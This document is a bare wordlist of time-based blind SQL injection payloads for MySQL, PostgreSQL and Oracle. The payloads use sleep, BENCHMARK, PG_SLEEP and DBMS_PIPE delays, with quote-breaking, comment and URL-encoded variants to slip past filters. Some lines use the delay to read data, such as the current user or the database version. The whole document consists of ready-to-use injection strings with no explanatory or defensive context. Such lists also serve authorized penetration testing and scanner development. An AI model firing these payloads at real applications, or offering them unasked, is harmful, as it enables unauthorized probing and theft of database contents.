XOR(if(now()=sysdate(),sleep(5),0))XOR
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(5),0))XOR"Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
R(if(now()=sysdate(),sleep(5),0))OR"*/
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
(if(now()=sysdate(),sleep(5),0) and 5=5)"/
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z
if(now()=sysdate(),SLEEP(5),0)
(SELECT(0)FROM(SELECT(SLEEP(5)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
(SELECT * FROM (SELECT(SLEEP(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
%2c(select%5*%5from%5(select(sleep(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
1'%2b(select*from(select(sleep(5)))a)%2b'
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(select*from(select(sleep(5)))a)
,(select * from (select(sleep(5)))a)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+
(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+
(select(0)from(select(sleep(5)))v)+'"+
(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+
(select(0)from(select(sleep(5)))v)+'"+
(select(0)from(select(sleep(5)))v)+"*/
',''),/*test*/%26%26%09sLeEp(5)%09--+
CASE//WHEN(LENGTH(version())=5)THEN(SLEEP(5*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(5)))a)
*'XOR(if(2=2,sleep(5),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>5, 1, 0)--//
'+(select*from(select(if(1=1,sleep(5),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(5)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XO
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 1=1)"/
%22)%20AND%201337%3dBENCHMARK(5000000,MD5(0x774c5341))%20AND%20(%221337%22%20LIKE%20%221337
